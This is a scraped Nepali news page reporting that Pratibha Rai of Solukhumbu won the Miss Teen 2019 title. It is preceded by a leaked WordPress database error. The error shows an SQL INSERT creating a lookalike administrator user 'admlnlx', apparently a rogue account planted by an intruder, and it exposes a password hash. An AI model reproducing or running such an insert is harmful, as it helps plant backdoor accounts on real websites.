WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BRRZIXj1Jnh.np1EgvrPcqv0m2bEaY1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 16:07:28', '', 'admlnlx', 'admlnlx')

मिस टिन २०१९ को उपाधी सोलुखुम्बुकी प्रतिभा राईलाई – Gaule Khabar

मिस टिन २०१९ को उपाधी सोलुखुम्बुकी प्रतिभा राईलाई

मिस टिन २०१९ को उपाधी सोलुखुम्बुकी प्रतिभा राईलाई

गाउँले न्युज, ७ भाद्र, काठमाण्डौ । सोलुखुम्बु जिल्लाको थुलुङ दुधकोशी गाउँपालिका ७ कि प्रतिभा (रानी) राईले मिस टिन २०१९ कोे उपाधि जितेकी छिन् ।

आज शनिबार राजाधानिको जमल स्थित नाचघरमा सम्पन्न प्रतियोगीताबाट राईले उपाधी जित्दै ताज पहिरिन सफल भएको हो । फाइनल चरणमा रहेका सात जना मध्ये मोष्ट भ्यूज र मिस ट्यालेण्टको उपाधी समेत प्रतिभानै बन्न सफल भएको छ ।

काठमान्डौको ग्रामर कलेज कोटेश्वरमा विज्ञान संकायमा कक्षा १२ मा अध्ययनरत प्रतिभा राईले उपाधी जितेसगै सहयोग गर्नुहुने सम्पुर्णमा धन्यवाद दिएका छन । राई सोलुखुम्बुलाई प्रतिनिधित्व गर्दै अडिसन दिएको बताए । आफ्नो रुची मात्र नभई गाउँठाउँको समेत पहिचान जोगाउँनको लागि समेत भाग लिएको बताउँने राईले आफ्नो मात्र नभई सोलुखुम्बुकै नाम राख्न सफल भएको प्रतिक्रिया दिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका